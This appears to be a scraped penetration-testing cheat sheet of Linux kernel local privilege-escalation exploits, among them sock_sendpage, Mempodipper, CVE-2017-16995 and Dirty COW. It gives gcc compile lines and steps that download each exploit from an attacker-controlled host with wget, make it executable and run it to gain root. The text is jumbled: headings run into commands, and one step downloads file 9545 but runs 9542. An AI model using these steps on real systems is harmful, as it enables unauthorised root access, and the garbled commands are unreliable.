**Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1) - **
If target machine has 32-bit architecture, we compile it with cross compiling at our machine.
Copy $ gcc -m32 -Wl,--hash-style=both -o 9542 9542.c
$ wget http://192.168.1.1/9545 && chmod +x 9542 && ./9542 Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation
If this doesn't work, we should change the module. - https://bugzilla.redhat.com/show_bug.cgi?id=516949#c24- List of Modules - 24
Line 349 - if ((out_fd = socket({MODULENAME} , SOCK_DGRAM, 0)) == -1)
Copy gcc -m32 -Wl,--hash-style=both 9545.c -o 9545
wget http://192.168.1.1/9545 && chmod +x 9545 && ./9545
Copy linux-sendpage.c (same 9545)
* Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
* are vulnerable.
* For i386 and ppc, compile with the following command:
* gcc -Wall -o linux-sendpage linux-sendpage.c
*
* And for x86_64 and ppc64:
* gcc -Wall -m64 -o linux-sendpage linux-sendpage.c Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)
exploits/linux/local/35161.c
Copy mkdir /tmp/poc
cd /tmp/poc
wget http://192.168.1.1/35161.c
gcc 35161.c -o poc
./poc Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation
Copy cp /usr/share/exploitdb/exploits/linux/local/44298.c .
gcc 44298.c -o exploit.php
wget http://192.168.1.1:8080/exploit.php
mv exploit.php exploit
chmod +x exploit
./exploit Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
Copy gcc cve-2017-16995.c -o cve-2017-16995
$ ./cve-2017-16995 Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
Copy test$ gcc -pthread dirty.c -o dirty -lcrypt dirty
./dirty 